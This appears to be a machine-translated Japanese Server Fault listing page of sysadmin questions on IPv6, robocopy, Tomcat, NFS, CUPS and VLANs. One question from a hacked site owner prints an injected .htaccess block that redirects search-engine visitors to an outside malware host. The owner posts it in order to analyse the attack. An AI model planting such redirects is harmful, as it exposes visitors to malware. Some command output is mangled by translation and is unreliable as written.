サーバー管理者

システムおよびネットワーク管理者向けのQ&A

2
ipv6: `ifconfig`は“ Scope:Link”を示します。「Scope:Link」とは何ですか?
私はRedHat 6の箱にいます。IPv6はデフォルトで有効になっており、すべてのインターフェースにIPv6アドレスが割り当てられています。 ifconfig これらのIPv6アドレスには「リンク」のスコープがあると報告されています。 %ifconfig eth0 Link encap:Ethernet HWaddr 00:24:90:AA:BB:1A inet addr:192.168.10.100 Bcast:192.168.10.255 Mask:255.255.255.0 inet6 addr:fe80 :: 224:90ff:feaa:bb1a / 64スコープ:リンクブロードキャストマルチキャストマルチキャストMTU:1500メトリック:1 eth1リンクencap:Ethernet HWaddr 00:24:90:AA:BB:1B inet addr:10.8.8.44 Bcast:10.8.8.255 Mask:255.255.255.0 inet6 addr:fe80 :: 224:90ff:feaa:bb1b / 64 Scope:リンクブロードキャスト実行マルチキャストMTU:1500メトリック:1 「Scope:Link」とはどういう意味ですか?IPv6アドレスの後半部分がNICのMACアドレスに似ていることがわかります。IPv6アドレスを明示的に設定していなくても、同じネットワークセグメントの他のデバイスはこのデバイスにpingできますか? このスコープがIPv4アドレスに表示されないのはなぜですか?「Scope:Link」はIPv6のみの概念ですか?
9 linux  ipv6 

2
完全にサイレントなロボコピー
一部のファイルをサイレントにロボコピーしようとしています。今、私はすべてをログファイルに入れてロボコピーを行っていますが、それは問題ありませんが、終了するLog File: C:\<logfiledestination>と印刷されます。私のコマンドは次のようになります: robocopy source destination /mir /xd .svn /log:log.txt /np >nul 2>&1。 オンラインで検索していると、>nul 2>&1何も表示されないのではないかと思いました。私はWindowsコマンドラインを初めて使用するので、何か問題が発生した場合はお知らせください。 編集:私はそこに見逃した幻の半分の文章がありました。今でも修正されました。

2
侵害されたFTPアカウントによるWebサイト攻撃の分析
私のサイトはハッキングされており、現時点ではいくつかの詳細を知っていますが、それがどのように発生したのか、または将来的にそれを防ぐ方法に正確に途方に暮れています。攻撃が再び発生するのを防ぐため、攻撃を分析するためにあなたの助けが必要です。これは少し長いですが、問題の解決に役立つ十分な情報を提供したいと思います。 これが起こったことです。 数週間前、ホスティング会社のGoDaddyからメールが届きました。私のサイトはリソースを使いすぎており、MySQLクエリが原因であると予想していました。問題のクエリは、5〜6語の検索クエリでした。私が設定した方法では、検索する用語が多いほど、クエリが複雑になります。問題ない。私はそれを修正しましたが、同時にGoDaddyも一時的に私のアカウントをシャットダウンし、すべてが正常に戻るまでに約3日かかりました。 その事件の後、私の検索エンジンのトラフィックは劇的に、約90%減少しました。私はそれを何も考えていなかったので、それをクエリの大失敗に書いて、グーグルがサイトを再クロールしたときにそれが時間内に戻ると考えて、それはうんざりしました。そうではなかった。 数日前、自分のサイトでマルウェアがホストされているというメールがユーザーから届きました。ブラウザに直接サイトを読み込みましたが、ページに何も挿入されていませんでした。次に、.htaccessファイルを確認したところ、次のことがわかりました。 <IfModule mod_rewrite.c> RewriteEngine On RewriteOptions inherit RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC] RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=584 …

3
Tomcat AJP-Connectorsはどのように機能しますか?
コネクタを使用してApache-webserverからTomcatにアクセスしたい。私はドキュメントに固執しました:http : //tomcat.apache.org/connectors-doc/generic_howto/quick.html私は、Debian-(Squeeze)-Systemで使用されているディレクトリ構造と一致するように少しだけ変更しました。 そこで、以下を/etc/apache2/httpd.confに追加しました: # Load mod_jk module # Update this path to match your modules location #LoadModule jk_module libexec/mod_jk.so # Declare the module for <IfModule directive> (remove this line on Apache 2.x) #AddModule mod_jk.c # Where to find workers.properties # Update this path to match your conf directory location …

2
典型的なNFSの読み取り/書き込み速度とは
HTTPビデオストリーミングファイルをNFSサーバー経由でWebサーバーに送信するサーバーをインストールしたばかりで、転送速度が最適化されていることを確認したい。しかし、どのような読み取り/書き込みレートが一般的であるかはわからないので、すでに最大に近い値を達成しているかどうかはわかりません。wsizeとrsizeパラメーターが重要であることは理解していますが、パラメーターのデフォルト値や、パラメーターを変更する価値があるかどうかはわかりません。 NFSに関するsourceforgeの記事に従って、私は書き込み速度を以下を使用してテストしました。 time dd if=/dev/zero of=/mnt/data/video/testfile bs=16k count=16384 また、書き込み速度は48MB / sです。 私はこれを何度もテストし(アンマウント/マウントしてキャッシュをクリアする)、この速度はほぼ一定でした。 私は読み取り速度をテストしました: time dd if=/mnt/data/video/testfile of=/dev/null bs=16k そして、117MB /秒の読み取り速度を取得します イーサネットスイッチとすべてのケーブルは1Gb / sに適しており、両方のマシンのNICはジャンボフレームを使用するように設定され(MTU = 9000)、/ etc / exportfsでasyncオプションを設定しました-速度は完璧なデータよりも重要です整合性。どちらのマシンも、かなり標準的なHP Proliantの7.2K SATAドライブ(一方は3G、もう一方は6G)です。どちらのマシンもLinux 2.6.18を使用しています。ファイルを送信するマシンはCentOS 5.5を実行しており、ファイルを受信するマシンはRHEL 5.4(Tikanga)を実行しています。 いくつかの異なるシステムをテストした経験のある人が、上記の数値がNFSデータ転送の典型的な値なのか、それとも増やす余地が十分あるのかを言えるといいのですが。

4
ディスクのスピンダウン時間を決定する方法
次のコマンドを使用して、APMとスピンダウン時間の両方を設定できます。 hdparm -S 246 -B 128 /dev/sda 残念ながら、私は情報出力でAPM値のみを見つけることができます: hdparm -I /dev/sda | grep Advanced スピンダウン時間の値を確認するにはどうすればよいですか?私のディスクは私の価値を無視していると思います。見たいです。smartctlを試しましたが、運が悪かったので、助けてください。 更新:tunedは非常に攻撃的であることがわかりました。下げると、ディスクが回転しません。そこに何かを設定していました。

3
CUPSからプリンターを削除するにはどうすればよいですか?
私のローカルCUPSサーバーは、使用するプリンターの名前について混乱しています。との2つの名前がhpextありhpext@vm-cupsます。どれが機能するかを予測することはできません。間違った機能を使用すると、ジョブはいつまでもキューに留まります。 にリストされているプリンタはありません/etc/cupsd/cupsd.conf。代わりに私はラインを持っています BrowsePoll cups.eecs.tufts.edu このサーバーはリストのみでhpext、リストはありませんhpext@vm-cups。 どういうわけか私のローカルサーバーが混乱していると考えています。メモリからプリンターを削除できれば、すべて順調です。しかし、ドキュメントのどこにもプリンターを削除するコマンドを見つけることができず、愚かなWebインターフェイスのDELETE PRINTERボタンは効果がありません。 私に何ができる?
9 linux  printing  cups 

4
サーバーを再起動せずにルートファイルシステムをアンマウントする
SSH経由でアクセスできるサーバーがあります。利用可能なKVMはなく、サーバー全体に対してルートパーティションは1つしかありません。不要なファイルをいくつか削除しましたが、それらをextundelete(http://extundelete.sourceforge.net/)で復元したいと思います。このため、対象のファイルシステムをマウント解除する必要があります。 再起動せずにルートファイルシステムをマウント解除する方法はありますか?一部のシステムにルートファイルシステムをマウントする前に、initrdがシステムをブートするのと同じようなことをするのでしょうか? ありがとう
9 linux  chroot 

4
netcatスループットは低いがiperfは高い
私は同じルーターに接続された2つのPC間のスループットをテストしていました。1つは100 MbpsのLAN、もう1つは54 Mbpsのwifi ここに興味深い部分があります: を使用してnc、AからBに送信するときに2.63MB / sを取得します(で測定pv -r|nc ipB) を使用してiperf、23MB /秒を取得しますが、これはほとんど問題ありません。 何が悪いのncでしょうか? OSはどちらもubuntu 11.04です。
9 bandwidth 

2
httpとhttpsに基づいてmod_proxyをProxyPassに構成する方法
SSLを有効にしてApache Tomcatを実行しています。私はリバースプロキシとして動作するApache HTTPサーバーを持っているので、ユーザーがhttp:// myserver / tomcat /を押すと、それらはhttp:// myserver:8080に渡されます。 ProxyPass /tomcat/ http://myserver:8080/ ProxyPassReverse /tomcat/ http://myserver:8080/ SSL用に構成されたApache HTTPサーバーも持っているので、ユーザーがhttps:// myserver / tomcat /を押すと、それらはhttps:// myserver:8443 /に渡されるはずです。 現在のProxyPassおよびProxyPassReverse構成では、非SSL URLにリダイレクトされます。着信要求に基づいて別のプロトコルとポートにリダイレクトするようにプロキシパスを設定するにはどうすればよいですか? つまり、誰かがHTTPS経由で入ってくる場合、どうすればそれらを私のtomcat @ https:// myserver:8443にリダイレクトできますか? 更新: @ mike-insch 私は試した: NameVirtualHost *:443 <VirtualHost *:80> ProxyPass /tomcat/ http://myserver:8080/ ProxyPassReverse /tomcat/ http://myserver:8080/ </VirtualHost> <VirtualHost *:443> ProxyPass /tomcat/ https://myserver:8443/ ProxyPassReverse /tomcat/ …

2
WiFiトラフィック分離のためのVLAN(VLANingの新機能)
私は、さまざまな部門にスイッチを備えた学校のネットワークを運営しています。すべてが中央のスイッチにルーティングされ、サーバーにアクセスします。 WiFiアクセスポイントをさまざまな部門に設置し、LANまたはインターネットに到達する前に、ファイアウォール(トラフィックをキャプティブポータルに接続して認証を提供できるUntangleボックス)にルーティングしたいと考えています。 APが関連するスイッチで接続するポートを別のVLANに設定する必要があることを知っています。私の質問は、これらのポートをどのように構成するかです。どちらがタグ付けされていますか?タグ付けされていないのはどれですか?通常のネットワークトラフィックを中断したくないのは明らかです。 私は言って正しいですか: ポートの大部分はタグなしVLAN 1である必要がありますか? WiFi APが接続されているものはタグなしVLAN 2(のみ)である必要があります 中央スイッチへのアップリンクはタグ付きVLAN 1およびタグ付きVLAN 2である必要があります 中央のスイッチの外部スイッチからの受信ポートもタグ付きVLAN 1およびタグ付きVLAN 2である必要があります ファイアウォールへのリンクは2つあり(それぞれが独自のNICにあります)、1つのタグなしVLAN 1(通常のインターネットアクセストラフィック用)と1つのタグなしVLAN 2(キャプティブポータル認証用)があります。 これは、すべてのワイヤレストラフィックが単一のNICを介してルーティングされることを意味し、ファイアウォールのワークロードも増加します。この段階では、その負荷については気にしていません。
9 networking  wifi  vlan 

1
openvpnクライアント:ホスト解決を特定のIPに強制します
クライアント側でclient.confファイルを設定して、特定のホスト/ドメインを特定のIPに解決することは可能ですか? たとえば、domain.tldは通常、インターネットNSから1.2.3.4に解決されます。 host domain.tld => 1.2.3.4 openvpn client.confを使用するときにdomain.tldを強制的に10.11.12.13に解決したい openvpn client.conf host domain.tld => 10.11.12.13

2
WebサイトのSSL証明書-正式な会社名はありませんか?
私は自分のソーシャルWebサイトを立ち上げていますが、ユーザーログインセクションにSSLが必要です。SSLを取得するには、組織名を必要とするCSRキーが必要です。この名前は、州で合法的に登録されている必要があります。 私には会社がなく、プロジェクトが始まり、将来の成長が見られない限り、会社を開く計画はありません。そのため、私のWebサイト名を組織名として使用すると(Webサイト以外にオフラインで存在しない)、まずいことになる? もちろん同時に、SSLで自分の名前を使用するのではなく、会社名を使用したいのです。


2
bashでEOFをエコーする方法は?[閉まっている]
閉まっている。この質問はトピックから外れています。現在、回答を受け付けていません。 この質問を改善してみませんか? サーバー障害のトピックになるように質問を更新します。 5年前休業。 検索後、EOFのアスキーはのようですが-1、どうすればechoそれを見つけることができますか? これを行う私の目的はctrl-d、私がecho外出した場合に押すと同じように動作するかどうかをテストすることEOFです。
9 bash 

弊社のサイトを使用することにより、あなたは弊社のクッキーポリシーおよびプライバシーポリシーを読み、理解したものとみなされます。
Licensed under cc by-sa 3.0 with attribution required.